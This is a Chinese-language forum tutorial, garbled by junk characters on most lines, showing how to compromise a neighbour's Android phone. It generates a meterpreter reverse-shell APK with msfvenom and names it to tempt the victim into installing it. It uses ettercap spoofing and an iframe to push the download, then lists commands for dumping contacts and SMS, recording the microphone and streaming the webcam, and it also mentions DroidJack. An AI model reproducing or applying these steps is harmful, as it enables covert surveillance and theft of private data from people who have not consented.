5 h- a3 O: m7 q) W) c 五、msf+ettercap入侵邻居安卓手机 7 l g0 m: Z9 t- {( F. }: \
& S! }' [4 m4 o4 e) Q
0 S$ r3 N& D5 p K W
首先启动msf
) M# r* P7 v$ h2 z w/ U
' ^/ o. T; d( i% p- @ m& |" f7 ^2 u6 z) H
先用kali生成一个安卓木马,如下命令:
5 Z6 u" k! w) A7 r1 ]9 W7 p 2 Y6 _7 J9 V9 D9 I1 O% V5 @: N
4 H8 o9 ], O8 W7 p Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 5 _1 R) D4 g1 w. r% b2 E
% S3 ^# |7 n, u. u8 {
" j5 L x N0 A& i% ^, p# `) P- U
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 , e! L, M* }* @' R
% f; a1 D1 r" g# j* B5 \% U2 F: M- e& Z
然后进入msf $ V; M3 \5 I; K, l4 C( ]$ t
- r; l% Z: C/ i6 q2 r/ Y( `: E6 [/ O3 l2 _' N9 i& C
use exploit/multi/handler
7 ~5 t5 `$ p6 a . E: h7 Y! h0 v, e$ c' B! p
' U6 h" h/ p, M( q0 O/ H: b3 w set payload android/meterpreter/reverse_tcp
L6 u% B" G9 `$ c6 S8 A0 x
I6 Q4 H8 M, s5 \- K r/ U2 J; a9 |/ B0 g" [& x' ~3 v/ d
set LHOST 192.168.0.109 //ip为kaili的ip
' l+ J' j0 R1 X
1 x& T; {: L2 i/ w+ z0 k. T. d
set LPORT 44444 //端口一定要与前面生成的木马的端口一致 9 u1 u- o0 B" t
7 c$ B9 t6 h3 P
3 t( N1 A7 m& ?" E0 ~' B3 A Exploit 3 b% ^+ ^$ T$ p2 Y$ Y6 ^# y
- R! E5 J, e7 ]& E8 x# H
# c& ^ }8 }/ S% Z& f% `5 J
) t2 g8 \' c, ^+ v ' [+ A5 ? F7 t5 S; j# x
1 e% p; z- w1 `" H. ] 下面我们开启ettercap -G # R2 k+ b4 [+ h" v, S8 k
$ Q7 S) }" y% V8 e4 Y
) w, r; C9 K0 ]7 b- K 我物理IP为
# O* A4 r/ @3 d9 k5 k8 A
7 T# t" T$ o* H. f u b c+ Y9 G5 m4 S5 G( l$ ?
( c; L3 \* E- H8 v+ Y2 o
! F( i4 B d8 \" s
V4 T% H# r$ X+ Y6 R2 u4 y# z s 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
5 e! a5 Y3 S8 L1 k% }
9 A' o$ S' R9 m" M. D; G0 n, ^5 n- R7 U5 n# I* c; L+ o% F$ B
下面我们来设置一下 2 g# ~4 W- X. C. _; z/ G
* e& w5 G9 z! W O5 T7 `/ ]
* c! [1 ^2 B; U$ [$ V/ ^" f 9 u5 b! k, N r* M4 T
# Y% v8 I! B6 m1 W; s4 }
( g" p( E* ^6 u 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, , U# _% m5 D$ P! g& P* H
' [8 g1 A# @ u7 b* N9 J. G n8 J A& M& w* W
. _. I) x3 s) Q; P- l ; Y/ \/ W% i, N8 t- |1 @
' @6 D7 O' K5 D* Z
- j) |9 j# A6 S+ d* n8 O m) Y b% c3 J
+ v3 [" w. ]; }2 O" B4 } \9 ?& N$ r& Q+ G2 q
1 K& w, @' o% `* R2 K" \
9 x' J* d) Z% Z8 _. M( B7 W& l7 I+ e. k3 h# z
R( Y) c- `6 U- ]4 H3 s0 f
8 ~) g& |* M& n$ k) I& } X2 ~' J! P$ s
) S( {! l/ ~ a! V& X' }4 Z: O( Z
4 i2 T/ e2 G" p) f
8 u0 `' X2 @6 P1 w. _+ {+ j . W6 I% R! T9 e3 _0 B, } N ^
) R0 N- @$ ?- D2 i( k: X
: x7 K) o9 \# a$ y; E( p ! v* j/ G K' r, P
+ J* Y- N1 A8 }3 a0 L' X. ^9 O
7 U0 `# o( B* m6 t3 d9 n8 r 4 K) _: y" g& t3 p
2 ^8 A+ M4 k; d/ i' G3 I% j. p! b, a/ G
8 ]' _1 g; N8 Q3 h
1 H# {% F- c9 s% r) ?" T
2 L- `. j) a& G8 C+ h 1 ]) \- L" N D3 @- t. M
# n( k* y$ I5 y
/ L5 ~" I1 G7 n9 ]2 G/ c
! Z: X& u7 E8 N9 Q: p R
8 L2 I6 V9 F3 f" L
& V, Q1 A6 L; Z t* v: Y; U
1 |: i7 Q; ?( L) s0 V
0 B/ `( H' V4 ~1 w
+ \% `1 F( S3 Q4 D+ E$ ], s
/ S1 Q" \1 i; z! |
+ G0 e+ }: s) w+ V2 L# A9 s6 E% g) a5 X5 L* C3 R0 z0 ?0 G
下面我们开始攻击 - A1 Z, e9 c3 v0 z) i
; [* i, |0 [. p/ y# ` t) k+ t, R& b
* C. x/ d9 \/ Q) h* c7 j 7 ]9 c7 \- L2 W7 _$ O
+ D# P7 a3 z% L) z
5 Q f) u: L* i* U4 |0 S3 S ! i& [( v, u0 z' ~3 v
1 \& a5 Q& g( C/ z3 s. p
1 ~" n' j1 U/ G' ?9 y9 C- F" Z
X B. |& s, [/ J5 D
, s+ S) ?# Z" Q p0 t) l: k5 _2 o
& p2 g7 f4 C7 J
+ r, N5 s# \4 z8 m8 N. W0 }# x
9 U1 O/ H9 y9 G! A& N
8 W# Z/ z4 |+ r
: @4 E& }1 y' k, X+ y9 c& ?* B/ w- a4 ]$ Q
大概过了5分钟多,发现反弹成功了
! k' n& c6 x( `( H1 a& }# }2 Z$ U ' S# z b+ U. M7 T
/ k6 }$ Z. _' U - \ G I; u$ b% D! r
/ B& I9 a o1 y) p8 \* a4 Q8 O. w, z& i3 B! G# g% W, ^
- z, F- W/ ~+ x! J# Q
3 J- u3 [# R7 C
% q% C2 d9 _3 O7 a* X6 |
9 z: B, r: p. r2 H( a8 n
0 F! [; H* b& l! V! z) S$ ]" M! Y5 y; ?5 S4 i
9 y+ x3 e* N7 |: b5 U
" j" E0 `' l8 ?9 v5 s. |% {/ I4 c! [
( x" L# K5 `, t/ G7 K$ ?* K0 T3 k0 J; u$ N
4 f( g" c$ ]6 K' w! E/ K, J8 k. B. V$ R+ U% \+ P& G) Y1 H
! B1 |+ p T0 D: ~ 4 ?/ w6 h) A A" e5 n6 H
! k4 g6 o5 d( S
4 @: g% J% {+ l: B 2 t) k* a" h$ l/ t
& z$ |1 I, P& t# h
执行命令
7 ?' U' l v* i
8 n0 t7 l- H: \9 p9 p2 m& v. L
6 [9 H/ o1 K9 Z2 ]- N- ^6 c
$ g3 q9 H! O0 J$ i/ [* A7 y& F3 U2 c9 {( U) t& M% [9 t
dump_contacts --》这个是导出电话
: I [$ o/ ]; h
' u- v% m( h9 u8 E/ w1 B' L; S* g
dump_sms --》这个是导出信息 2 L$ b5 S6 q6 c$ w# {, L( C
7 f- y3 P- b$ P$ e- S. R) a
) H& {% C$ a4 B" T' [4 e8 I record_mic Record audio from the default microphone for X seconds
! k4 u' c% }. h# { ) L* {6 u1 r G: x# S1 c
0 |+ W9 J& G7 l5 h1 d0 k. ]
webcam_chat Start a video chat 2 V U' f `9 S* {* z
4 ]. M5 g- L+ d% f2 G# ]1 b4 z9 t2 ^5 W- U9 j' L
webcam_list List webcams % m0 T4 d: C/ E$ a/ w
$ J9 i/ c! l* t% j4 O/ j. ^
& w" r+ t0 \, d6 ]2 ?/ u webcam_snap Take a snapshot from the specified webcam " v0 M& x* X) \4 r( Y# a/ D
7 G( n* u3 q7 |. ~9 P. j
/ b+ j4 E, e+ p" X. S
webcam_stream  lay a video stream from the specified webcam 9 |& g) O6 N2 j9 H# l# ?1 b
" A b# D0 x: k7 \
- T, |8 i3 i4 b) k \
! N$ H6 L- Y4 E% v3 ?- d! t$ N0 D
; t+ X( J2 \! v& x+ `' o. `& {( F# @% U; Q" l( G3 {8 C
" r S4 s+ W7 S" Z
0 N3 `$ Z _0 T$ j/ I% H1 p G$ y- n7 ^
0 _8 L- L- L u$ L
我们打开看一下电话薄,
, S6 X {3 l$ A% Y4 h* W $ e/ ]7 u" L) B* u5 Y7 @
& }1 L$ `& N% r: K; O C4 _/ {( d
- E7 f. L8 q4 ~6 f
+ ^3 {. J5 T2 L, Y# X& a% F$ d' G- ^; D3 X
% G4 c% o9 l0 q8 r
9 m0 X6 g/ j% g/ m. s' O0 o$ S; l% S
8 Y# W! {2 d4 ~7 @7 H : }+ ~+ H* Z" l, n) Q& A- w0 Q! X
/ X, Q" U! s/ j' ~5 T2 E* b
% ^# p7 k9 i* k+ ?1 d$ }! w 9 r! E( F4 J. R' c7 `3 p
/ `; v+ e+ H! _( r3 V
5 [- _! J5 s1 W* q1 F & H2 V$ l s) y2 ~- o
0 z2 {9 S& m+ @, C
& T. {8 W) V; V9 d
: D. L4 w" R$ V0 b2 N% D. q
. f4 Q% G. Z( o; W; @' [
; T8 m# n% M+ I/ ^' t1 F' S5 x 我们同时欺骗成DroidJack木马,使用方法如图: / W3 {4 a: k6 N3 v
" _1 H1 P* [0 {6 v" [. {0 [. N, U5 t
1 A! x& e/ C! d- X, j
) }; N$ s3 D* E# D& K) I7 i1 o4 O* j/ f) G8 K A0 f& p" z4 a
$ Q, V/ u+ {# I# o0 M, ?
+ y3 f, Y. P3 S7 H
( h0 d4 S7 A3 O5 m; k9 R
- j" r% Q2 d5 j8 a 0 j( n( \% H9 [; y2 @2 M, L
+ E; _: [! J% U/ A/ _. t 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
& L% h# X7 O1 ^- E `: W) L9 C
f9 @, y, E2 J; P: }. u
5 L, f/ ^1 r& D4 x$ @
/ f3 w" s) G3 H
9 ]! k' S: D- G" V) y" ~2 ~- m/ m" V/ g% ]$ _; h) r. [: Q
( F( z% ?( X+ f" v6 @; c " e" F( j7 T4 p! t" f
9 ^; X t i$ G" ]) ]+ P
" P5 S( f5 p3 i2 G/ I3 ~. n 0 u5 @6 u7 Y& l* u/ ~# t8 Q/ f
% i! u- O1 r9 b, b
- c/ \3 ?' U- X' I/ Y7 N
9 x0 P/ @: O5 W( p
8 R/ t0 _# ?. ~9 k6 c% i8 A
4 l3 {- C# C# v1 Q# P |